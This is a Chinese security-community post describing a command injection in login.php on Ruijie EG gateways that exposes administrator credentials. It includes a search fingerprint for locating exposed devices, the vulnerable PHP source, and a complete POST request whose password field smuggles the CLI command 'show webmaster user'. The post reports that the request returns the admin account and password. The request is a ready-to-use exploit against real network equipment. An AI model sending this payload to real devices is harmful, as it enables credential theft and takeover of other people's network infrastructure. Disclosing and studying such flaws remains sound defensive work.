奇安信攻防社区-Ruijie EG易网关 login.php 管理员账号密码泄露漏洞

Ruijie EG易网关 login.php 管理员账号密码泄露漏洞

# Ruijie EG易网关 login.php 管理员账号密码泄露漏洞 ## 漏洞描述 RuijieEG易网关 login.php存在 CLI命令注入，导致管理员账号密码泄露漏洞 ## 漏洞影响 RuijieEG易网关 ## 网...

Ruijie EG易网关 login.php 管理员账号密码泄露漏洞
==================================

漏洞描述
----

RuijieEG易网关 login.php存在 CLI命令注入，导致管理员账号密码泄露漏洞

漏洞影响
----

RuijieEG易网关

网络测绘
----

app="Ruijie-EG易网关"

漏洞复现
----

登录页面如下

![img](https://shs3.b.qianxin.com/butian_public/f723151a929766e43809d4586d6a074fa8c736de069ea.jpg)

漏洞文件 login.php

```php
<?php

/**
 * 用户登录处理
 */
define('IN', true);     //定位该文件是入口文件
define('DS', DIRECTORY_SEPARATOR);
define('AROOT', dirname(__FILE__) . DS);

class defaultController {

function __construct() {

}

/**
     * 登录处理
     */
    public function indexAction() {
$username = p("username");$password = p("password");$data = [];
$reg='/(\r|\n)+/';
if (count(preg_split($reg, $username)) > 1 || count(preg_split($reg, $password)) > 1) {
$data["status"] = 6;
$data["msg"] = "username or password can't exist '\r\n'";
json_echo($data);
exit();
}
        if ($username == FALSE || $password == FALSE) {
            $data["status"] = 5;
            $data["msg"] = "username or password can't empty";
            json_echo($data);
            exit();
        }
        $res = execCli("exec", "webmaster $username $password");
        if ($res["status"] != 1) {
            json_echo($res);
            exit();
        }
        $isSuccess = trim($res["data"]);
        if ($isSuccess == 0) {    //用户名、账号验证成功
            session_start();
            $_SESSION['username'] = $username;  //记录用户名
            $_SESSION["lasttime"] = time();    //记录登录时间
            $config = @file_get_contents(DS . "data" . DS . "web.config");    //获取web配置信息
            if ($config != false) {
                $config = unserialize($config);
                $_SESSION["timeout"] = isset($config["loginTimeout"]) ? $config["loginTimeout"] * 60 : c("timeout");
            } else {
                $_SESSION["timeout"] = c("timeout");
            }
            setcookie("user", $_SESSION['username']);
        }
        $res["data"] = $isSuccess;
        json_echo($res);
    }

/**
     * 获取设备信息
     */
    function versionAction() {
        $info = $version = execCli("exec", "show version detail", "");
        $info["data"] = preg_split("/\r*\n/", $info["data"]);
        json_echo($info);
    }

}

include_once(AROOT . "init.php");    //mvc初始化入口，放在底部
```

关键代码部分

```plain
if ($username == FALSE || $password == FALSE) {
            $data["status"] = 5;
            $data["msg"] = "username or password can't empty";
            json_echo($data);
            exit();
        }
        $res = execCli("exec", "webmaster $username $password");
        if ($res["status"] != 1) {
            json_echo($res);
            exit();
        }
        $isSuccess = trim($res["data"]);
```

发送请求包，拼接 CLI指令 `show webmaster user`

```plain
POST /login.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

username=admin&password=admin?show+webmaster+user
```

![img](https://shs3.b.qianxin.com/butian_public/f65374525fc36d850c25d52425b74db588a6f29007d2a.jpg)

成功获取账号密码

发表于 2024-07-12 18:49:46
阅读 ( 970 )
分类：网络设备

Ruijie EG易网关 login.php 管理员账号密码泄露漏洞

0 条评论